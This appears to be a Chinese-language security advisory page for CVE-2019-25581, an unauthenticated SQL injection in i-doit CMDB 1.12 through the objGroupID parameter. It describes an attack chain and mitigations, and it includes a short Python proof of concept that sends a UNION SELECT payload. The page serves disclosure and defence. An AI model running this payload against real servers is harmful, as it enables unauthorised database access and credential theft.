IPBUF安全漏洞报告
English
CVE-2019-25581 CVSS 8.2 高危

CVE-2019-25581 i-doit CMDB SQL注入漏洞

披露日期: 2026-03-21
来源: [email protected]

漏洞信息

漏洞编号
CVE-2019-25581
漏洞类型
SQL注入
CVSS评分
8.2 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
i-doit CMDB

相关标签

SQL注入i-doitCMDB无需认证高危

漏洞概述

i-doit CMDB 1.12版本存在严重的SQL注入漏洞。由于未对objGroupID参数进行严格过滤,未经身份认证的攻击者可通过发送特制GET请求注入恶意SQL代码。利用该漏洞可执行任意SQL查询,导致数据库敏感信息泄露,包括用户名、数据库名及版本详情,严重威胁系统机密性。

技术细节

该漏洞的根本原因在于i-doit CMDB 1.12版本在处理特定接口请求时,对`objGroupID`参数缺乏有效的安全过滤机制。后端代码直接将该参数拼接到SQL语句中执行,未采用参数化查询或转义处理。攻击者无需任何身份认证即可利用此缺陷,通过构造包含SQL注入语法(如单引号、注释符、UNION SELECT语句)的恶意Payload发送GET请求。成功注入后,攻击者可以利用报错注入或联合查询技术,从数据库中提取敏感信息,包括数据库版本、表结构、管理员用户名及密码哈希等。由于CVSS评分为8.2,该漏洞具有较高的利用价值,可能导致整个CMDB系统数据被窃取或篡改,严重威胁业务安全。

攻击链分析

STEP 1
侦察
攻击者识别出目标服务器正在运行i-doit CMDB 1.12版本。
STEP 2
漏洞探测
攻击者向目标发送包含恶意SQL注入Payload的GET请求,测试objGroupID参数是否存在过滤缺陷。
STEP 3
执行注入
确认漏洞存在后,攻击者发送UNION SELECT等SQL语句,执行任意数据库查询命令。
STEP 4
数据窃取
攻击者从数据库中提取敏感信息,如管理员凭证、数据库结构及版本信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def check_sqli_vuln(target_url): # Example payload to extract database version # The payload attempts a UNION SELECT to retrieve the version() payload = "1' UNION SELECT NULL, NULL, version(), NULL-- -" params = { "objGroupID": payload } try: response = requests.get(target_url, params=params, timeout=10) # Analyze response to check for database version or SQL errors if response.status_code == 200: print("Request sent successfully.") print("Response snippet:", response.text[:200]) # Further logic needed to confirm vulnerability based on output else: print(f"Target returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"Error connecting to target: {e}") # Usage # target = "http://<target-ip>/i-doit/" # check_sqli_vuln(target)

影响范围

i-doit CMDB 1.12

防御指南

临时缓解措施
建议立即升级软件至最新安全版本。如暂时无法升级,应在网络边界部署WAF规则,拦截针对objGroupID参数的恶意SQL注入请求,并限制数据库用户的访问权限。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表